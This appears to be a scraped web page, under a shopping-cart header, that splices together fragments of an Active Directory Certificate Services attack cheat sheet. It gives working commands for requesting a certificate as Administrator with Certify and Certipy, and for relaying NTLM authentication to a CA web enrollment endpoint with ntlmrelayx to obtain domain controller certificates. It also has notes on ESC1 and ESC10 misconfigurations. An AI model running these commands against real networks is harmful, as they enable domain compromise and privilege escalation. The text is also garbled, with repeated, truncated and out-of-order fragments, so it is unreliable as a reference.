Cart

You have no items in your shopping cart.

Hacktricks Adcs Link

# Request a certificate for a domain admin (using Certify) Certify.exe request /ca:dc.contoso.local\CONTOSO-CA /template:UserSAN /altname:Administrator certipy auth -pfx administrator.pfx -domain contoso.local

# Relay NTLM auth from a compromised host to ADCS ntlmrelayx.py -t http://ca.contoso.com/certsrv/certfnsh.asp -smb2support --adcs --template DomainController certipy relay -target http://ca.contoso.com -template DomainController hacktricks adcs

Certify.exe request /ca:DC.CONTOSO.LOCAL\CONTOSO-CA /template:User /altname:Administrator Condition : ADCS web enrollment interfaces ( /certsrv/ , /CertSrv/ , /certsrv/mscep/ ) are enabled and not configured with extended protection or HTTPS. # Request a certificate for a domain admin

: Similar to ESC1, request a certificate for any user. ESC10 – Weak Authentication on CA Condition : CA’s authentication strength is set to low (e.g., Windows Integrated Auth without any additional protection). : Modify template to enable ESC1 conditions (e

Introduction Active Directory Certificate Services (ADCS) is Microsoft’s PKI (Public Key Infrastructure) implementation. When integrated with Active Directory, ADCS enables certificate-based authentication, smart card logons, and encryption. However, misconfigurations in ADCS are notoriously common and can lead to domain compromise, privilege escalation, and persistence.

: Modify template to enable ESC1 conditions (e.g., allow SAN supply), then request as ESC1.

(using ntlmrelayx.py from Impacket):